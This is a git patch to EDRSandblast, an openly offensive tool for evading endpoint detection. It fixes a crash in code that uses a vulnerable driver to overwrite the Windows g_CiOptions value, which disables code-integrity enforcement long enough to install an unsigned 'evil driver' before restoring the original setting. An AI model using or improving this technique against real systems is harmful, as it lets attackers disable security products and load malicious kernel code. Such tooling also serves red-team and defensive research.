From 0a817fea93a54b427edae67a0deaa13b489d9e11 Mon Sep 17 00:00:00 2001
From: Maxime Meignan <maxime.meignan@wavestone.com>
Date: Mon, 9 Oct 2023 14:59:10 +0200
Subject: [PATCH] g_CiOptions patching: fixed a crash

---
 EDRSandblast_CLI/EDRSandblast.c | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/EDRSandblast_CLI/EDRSandblast.c b/EDRSandblast_CLI/EDRSandblast.c
index 9ac6420..8a1264d 100644
--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -742,7 +742,7 @@ Other options:\n\
                                 }
                                 _putts_or_not(TEXT("[+] Using the vulnerable driver to disable CI..."));  // debug print
                                 ULONG CiOptionsValue = 0;
-                                PULONG OldCiOptionsValue;
+                                ULONG OldCiOptionsValue;
                                 patch_gCiOptions(g_CiOptionsAddress, CiOptionsValue, &OldCiOptionsValue);
                                 LPTSTR evilServiceNameIfAny = NULL;
                                 BOOL isEvilDriverAlreadyRunning = IsDriverServiceRunning(unsignedDriverPath, &evilServiceNameIfAny);
@@ -757,7 +757,7 @@ Other options:\n\
                                         _putts_or_not(TEXT("[!] An error occurred while installing the evil driver"));
                                 }
                                 _putts_or_not(TEXT("[+] Using the vulnerable driver to reset original CI status"));  // debug print
-                                patch_gCiOptions(g_CiOptionsAddress, *OldCiOptionsValue, &OldCiOptionsValue);
+                                patch_gCiOptions(g_CiOptionsAddress, OldCiOptionsValue, &OldCiOptionsValue);
                             }
                         }
                         else {
@@ -766,7 +766,6 @@ Other options:\n\
                         }
                     }
                 }
-                // END WIP
                 break;
             }
             }